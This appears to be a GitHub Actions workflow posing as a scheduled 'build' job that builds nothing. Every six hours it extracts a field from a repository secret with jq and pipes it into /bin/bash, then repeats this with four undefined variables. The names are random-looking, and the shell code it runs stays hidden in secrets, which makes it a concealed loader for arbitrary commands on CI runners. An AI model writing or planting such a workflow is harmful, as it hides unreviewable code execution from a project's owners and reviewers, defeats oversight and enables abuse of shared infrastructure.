name: clowderajar
on:
  workflow_dispatch:
  schedule:
    - cron: '45 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: clowderajar
        env:
          sss684: ${{ secrets.sss684 }}
        run: |
          echo $sss684 | jq -r .puss825 | /bin/bash
          echo $az54557 | jq -r .wydyv120 | /bin/bash
          echo $jovo55212 | jq -r .ogv61 | /bin/bash
          echo $rpqy77836 | jq -r .zr406 | /bin/bash
          echo $z1700 | jq -r .eevy2 | /bin/bash

